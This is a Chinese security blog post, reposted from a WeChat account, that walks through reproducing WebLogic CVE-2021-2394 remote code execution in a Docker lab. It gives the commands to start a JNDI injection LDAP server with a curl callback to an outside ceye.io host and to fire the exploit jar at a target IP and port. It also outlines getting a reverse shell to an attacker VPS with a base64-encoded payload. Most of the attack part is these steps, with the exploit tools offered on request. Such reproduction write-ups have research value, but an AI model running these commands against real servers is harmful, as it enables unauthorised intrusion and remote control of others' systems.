【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

admin 2021年8月16日23:53:52安全文章1 1,493 views11423字阅读4分44秒阅读模式

0x01 前言

    近日翻看了最新的一些漏洞,看到了一个weblogic的新漏洞,便找了一些网上的文章资料,准备复现一下补充补充知识。

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

文中涉及的工具可后台回复关键字"2394"获取

0x02 环境搭建

所用到的环境如下:

docker // 这里用的是vulhub里的CVE-2020-14882漏洞环境ceye.io   //   dns接收平台kali虚拟机两台

这里直接利用docker搭建的环境

docker-compose up -d     //启动环境

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现


0x03 漏洞复现

先起个LDAP服务

命令如下:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl xxx.ceye.io-A 192.168.46.135
-C [执行的命令] -A [开启ldap服务的ip]

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

执行EXP

命令如下:java -jar CVE_2021_2394.jar 192.168.46.131 7001 ldap://192.168.46.135:1389/s5tb3ejava -jar CVE_2021_2394.jar [被攻击者IP] [端口] [生成的ldap服务,我用的jdk8]

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

Success!!

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

反弹shell

注意:反弹shell时命令需要进行base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

将编码后的payload替换,启动LDAP服务

vps开启监听

执行EXP

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

反弹shell成功!!

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

0x04 参考链接

https://mp.weixin.qq.com/s/ZdA17tU_PeJEkc26yfK3uQhttps://www.cnblogs.com/potatsoSec/p/15062094.htmlhttps://www.jianshu.com/p/60f0f8667a6f





本文仅供学习交流!由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

往期文章有彩蛋哦【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

一如既往的学习,一如既往的整理,一如即往的分享。【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

如侵权请私聊公众号删文

本文始发于微信公众号(F12sec):【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月16日23:53:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现 https://cn-sec.com/archives/450441.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:1   其中:访客  1   博主  0
    • 1 1

      2394嗯